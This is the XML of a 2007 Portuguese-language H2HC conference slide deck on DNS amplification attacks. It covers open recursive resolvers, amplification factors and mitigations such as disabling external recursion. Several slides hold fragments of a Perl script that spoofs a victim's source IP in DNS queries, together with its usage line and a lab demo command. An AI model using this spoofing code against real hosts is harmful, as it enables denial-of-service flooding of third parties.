              <a:rPr lang="pt-BR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=&gt;{}});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#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send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packet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$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sock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-&gt;set({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=&gt; {</a:t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      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saddr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=&gt; $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src_ip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daddr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=&gt; "$ARGV[0]",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frag_off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=&gt;0,tos=&gt;0,id=&gt;1565},</a:t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      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udp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=&gt; {source =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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53,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       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dest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=&gt; 53, data=&gt;$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dnsdata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       } });</a:t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$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sock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-&gt;</a:t>
            </a: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send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;</a:t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}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pt-BR" sz="3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exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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(0);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  <a:p>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagem 3" descr="h2h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57166"/>
            <a:ext cx="2276475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596" y="1071546"/>
            <a:ext cx="8229600" cy="1143000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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.fazendo a façanha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158" y="2332037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pt-B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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> dnsamp_mphx2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pl</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="5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t-B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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Amplication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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pt-BR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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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pt-BR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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Demonstratio</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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t-B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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>H2HC - Hackers to Hackers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Conference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Fourth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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pt-BR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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Edition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (mphx2) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR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t-BR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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Usage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: dnsamp_mphx2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>recursive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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pt-BR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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> to resolve&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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endParaRPr lang="pt-B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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-B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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> dnsamp_mphx2 10.28.34.251 teste.h2hc.org.br 10.28.34.149</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="5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t-BR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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>abused</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: 10.28.34.251...</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="5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4" name="Imagem 3" descr="h2h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57166"/>
            <a:ext cx="2276475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0034" y="928670"/>
            <a:ext cx="8229600" cy="1143000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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r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4" name="Imagem 3" descr="h2h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57166"/>
            <a:ext cx="2276475" cy="609600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285992"/>
            <a:ext cx="7724775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0034" y="928670"/>
            <a:ext cx="8229600" cy="1143000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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>packets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (1.5k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>limit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)!</a:t>
            </a:r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4" name="Imagem 3" descr="h2h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57166"/>
            <a:ext cx="2276475" cy="609600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1571604" y="5643578"/>
            <a:ext cx="58579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14X o valor  dos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4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queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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!</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="4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6738" y="1800225"/>
            <a:ext cx="8010525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596" y="1000108"/>
            <a:ext cx="8229600" cy="1143000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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>packets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unreachable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)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28596" y="2714620"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/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os pacotes ICMP são lançados da vítima para o servidor de DNS em resposta a um pacote UDP inesperado enviado  pelo servidor de DNS.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Imagem 3" descr="h2h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57166"/>
            <a:ext cx="2276475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pt-BR" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>packets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt; MTU = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fragmented</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagem 3" descr="h2h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57166"/>
            <a:ext cx="2276475" cy="609600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214282" y="5857892"/>
            <a:ext cx="8572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43X o valor  dos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4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queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagem 5" descr="recursivos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1571612"/>
            <a:ext cx="8677275" cy="4124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596" y="1071546"/>
            <a:ext cx="8229600" cy="1143000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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tools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00364" y="714356"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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ites para consultas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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http://www.squish.net/dnscheck/</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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http://www.dnsstuff.com/</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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dig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(*</a:t>
            </a:r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nix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  <a:p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pacotes!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-B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Imagem 3" descr="h2hc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8" y="357166"/>
            <a:ext cx="2276475" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagem 4" descr="recursivo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472" y="3500438"/>
            <a:ext cx="7796209" cy="1584304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagem 5" descr="nao-recursivo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472" y="5131782"/>
            <a:ext cx="7791475" cy="15833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596" y="1214422"/>
            <a:ext cx="8229600" cy="1143000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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.solução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28596" y="2332037"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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desabilitar </a:t>
            </a:r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cache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 recursividade dos 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servidores </a:t>
            </a:r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autoritativos</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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esabilitar consulta externa dos servidores recursivos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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Imagem 4" descr="h2h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57166"/>
            <a:ext cx="2276475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1143000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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.concluindo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0034" y="1928802"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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UDP? Fraco</a:t>
            </a:r>
          </a:p>
          <a:p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DNS? Fraco</a:t>
            </a:r>
          </a:p>
          <a:p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Mas....administradores que não sabem administrar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagem 4" descr="h2h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57166"/>
            <a:ext cx="2276475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596" y="1000108"/>
            <a:ext cx="8229600" cy="1143000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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.referências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0034" y="2143116"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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http://www.isotf.org/news/DNS-Amplification-Attacks.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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http://www.cert.br/docs/whitepapers/dns-recursivo-aberto/</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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4"/>
              </a:rPr>
              <a:t>http://hostinet.com/noticiashosting/33/ataques-ddos-con-servidores-dns-recursivos.html</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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buNone/>
            </a:pP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Imagem 3" descr="h2hc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58" y="357166"/>
            <a:ext cx="2276475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596" y="928670"/>
            <a:ext cx="8229600" cy="1143000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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.agradecimentos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28596" y="2332037"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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rganização do H2HC</a:t>
            </a:r>
          </a:p>
          <a:p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aos presentes – Will !!</a:t>
            </a:r>
          </a:p>
          <a:p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Dona Jacira (</a:t>
            </a:r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sogrona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 – valeu pelo cartão!</a:t>
            </a:r>
          </a:p>
          <a:p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Universidade – valeu pelo apoio ($$)!</a:t>
            </a:r>
          </a:p>
          <a:p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Trampo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– valeu por me dar folga, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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rs</a:t>
            </a:r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!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-B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Todos que ajudaram/apoiaram!!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Imagem 3" descr="h2h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57166"/>
            <a:ext cx="2276475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pt-BR" sz="6000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pt-BR" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Obrigado ! ! !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dúvidas?</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="5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algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="4800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="5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algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="4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itchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;bruno.at.bsdmail.com&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="5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4" name="Imagem 3" descr="h2h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57166"/>
            <a:ext cx="2276475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444</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Apresentação na tela (4:3)</PresentationFormat>
  <Paragraphs>126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27" baseType="lpstr">
      <vt:lpstr>Tema do Office</vt:lpstr>
      <vt:lpstr>DNS Amplification Attack Hackers To Hackers Conference – Fourth Edition</vt:lpstr>
      <vt:lpstr>.quem sou eu</vt:lpstr>
      <vt:lpstr>.protocolo DNS</vt:lpstr>
      <vt:lpstr>.UDP </vt:lpstr>
      <vt:lpstr>.atuais vulnerabilidades</vt:lpstr>
      <vt:lpstr>.tipos de servidores</vt:lpstr>
      <vt:lpstr>.funcionamento da recursividade</vt:lpstr>
      <vt:lpstr>.let’s have fun!!</vt:lpstr>
      <vt:lpstr>.manipulação de hosts</vt:lpstr>
      <vt:lpstr>.servidor a ser consultado</vt:lpstr>
      <vt:lpstr>.grande TXT (exemplo)</vt:lpstr>
      <vt:lpstr>.pseudo RR OPT in packet!</vt:lpstr>
      <vt:lpstr>.servidores recursivos abertos</vt:lpstr>
      <vt:lpstr>.the attack!!</vt:lpstr>
      <vt:lpstr>.dono da façanha (source-code)</vt:lpstr>
      <vt:lpstr>.fazendo a façanha</vt:lpstr>
      <vt:lpstr>.queries packet!</vt:lpstr>
      <vt:lpstr>.response packets (1.5k limit)!</vt:lpstr>
      <vt:lpstr>.icmp packets (port unreachable)</vt:lpstr>
      <vt:lpstr>.response packets &gt; MTU = fragmented!</vt:lpstr>
      <vt:lpstr>.DNS tools</vt:lpstr>
      <vt:lpstr>.solução</vt:lpstr>
      <vt:lpstr>.concluindo</vt:lpstr>
      <vt:lpstr>.referências</vt:lpstr>
      <vt:lpstr>.agradecimentos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DNS Amplification Attack Hackers To Hackers Conference – Fourth Edition</dc:title>
  <dc:creator>Bruno</dc:creator>
  <cp:lastModifiedBy>Bruno</cp:lastModifiedBy>
  <cp:revision>64</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2007-10-15T18:21:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2007-10-28T14:27:23Z</dcterms:modified>
</cp:coreProperties>
</file>